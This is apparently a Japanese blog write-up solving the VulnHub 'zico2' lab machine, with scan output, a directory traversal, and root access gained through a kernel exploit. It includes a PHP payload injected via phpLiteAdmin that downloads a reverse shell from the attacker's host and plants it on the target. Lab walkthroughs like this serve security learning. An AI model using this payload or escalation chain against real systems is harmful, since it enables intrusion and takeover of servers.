#!

路上に就職!

zico2 writeup

vulnhubにあるzico2という問題を解いた。

www.vulnhub.com

まずはホストを探すためにarp-scan を使用した。

Interface: vboxnet0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.56.100  08:00:27:40:cd:ca   CADMUS COMPUTER SYSTEMS
192.168.56.101  08:00:27:98:69:ca   CADMUS COMPUTER SYSTEMS

512 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 1.857 seconds (137.86 hosts/sec). 2 responded

ipアドレスは192.168.56.101なのでブラウザでアクセスしてみる。 f:id:x6d61:20171009005059p:plain

脆弱性を探していると view.php?page=tools.html にディレクトリトラバーサルが存在することがわかった。 f:id:x6d61:20171009005425p:plain

php://filterでソースコードを取得することもできず、特に有用な情報を得られなかったので dirsearchを使い他のファイルがないか探すことにした。

Target: http://192.168.56.101/

[23:44:27] Starting:
[23:44:36] 403 -  286B  - /.hta
[23:44:36] 403 -  293B  - /.ht_wsr.txt
[23:44:36] 403 -  295B  - /.htaccess-dev
[23:44:36] 403 -  297B  - /.htaccess-local
[23:44:36] 403 -  297B  - /.htaccess-marco
[23:44:36] 403 -  295B  - /.htaccess.BAK
[23:44:36] 403 -  295B  - /.htaccess.old
[23:44:36] 403 -  296B  - /.htaccess.orig
[23:44:36] 403 -  296B  - /.htaccess.bak1
[23:44:36] 403 -  296B  - /.htaccess.save
[23:44:36] 403 -  298B  - /.htaccess.sample
[23:44:36] 403 -  295B  - /.htaccess.txt
[23:44:36] 403 -  295B  - /.htaccessOLD2
[23:44:36] 403 -  294B  - /.htaccessBAK
[23:44:36] 403 -  296B  - /.htaccess_orig
[23:44:36] 403 -  294B  - /.htaccessOLD
[23:44:36] 403 -  297B  - /.htaccess_extra
[23:44:36] 403 -  294B  - /.htaccess_sc
[23:44:36] 403 -  290B  - /.htgroup
[23:44:36] 403 -  292B  - /.htaccess~
[23:44:37] 403 -  292B  - /.htpasswds
[23:44:37] 403 -  295B  - /.htpasswd-old
[23:44:37] 403 -  290B  - /.htusers
[23:44:37] 403 -  296B  - /.htpasswd_test
[23:44:56] 200 -    1KB - /README.md
[23:45:37] 403 -  290B  - /cgi-bin/
[23:45:45] 301 -  314B  - /css  ->  http://192.168.56.101/css/
[23:45:47] 301 -  318B  - /dbadmin  ->  http://192.168.56.101/dbadmin/
[23:45:47] 200 -  917B  - /dbadmin/
[23:45:49] 403 -  286B  - /doc/
[23:45:49] 403 -  300B  - /doc/stable.version
[23:45:49] 403 -  301B  - /doc/en/changes.html
[23:45:59] 200 -    3KB - /gulpfile.js
[23:46:02] 301 -  314B  - /img  ->  http://192.168.56.101/img/
[23:46:04] 200 -    8KB - /index
[23:46:05] 200 -    8KB - /index.html
[23:46:08] 301 -  313B  - /js  ->  http://192.168.56.101/js/
[23:46:22] 200 -  789B  - /package.json
[23:46:22] 200 -  789B  - /package
[23:46:36] 403 -  295B  - /server-status
[23:46:36] 403 -  296B  - /server-status/
[23:46:48] 200 -    8KB - /tools
[23:46:52] 200 -    0B  - /view.php

Task Completed

dbadminというディレクトリがあるらしいのでアクセスすると test_db.phpというファイルがあった。 f:id:x6d61:20171009005842p:plain

アクセスするとphpLiteAdminという管理パネルらしい。バージョンは1.9.3 f:id:x6d61:20171009010027p:plain exploitがあるかGoogle先生で検索すると

www.youtube.com

上記の動画が引っかかった。動画と同じ手順で下記のコードを実行する。

<?php function dl($u,$o){$c = file_get_contents($u);file_put_contents($o,$c);}dl("http://192.168.56.1/php-reverse-shell.php",realpath(realpath(dirname(__FILE__)))."/back.php")?>

phpのreverse shellは下記のURLから拝借した。 http://pentestmonkey.net/tools/web-shells/php-reverse-shell

ビンゴ!

f:id:x6d61:20171009010454p:plain

shellを奪えた。

~$ uname -a
Linux zico 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

kernel exploitがないか探すとCVE-2013-2094が使えるらしい。 コンパイルして実行するとrootが取れた。

あとはflagを読むだけ

whoami
root
cd /root
ls
flag.txt
cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#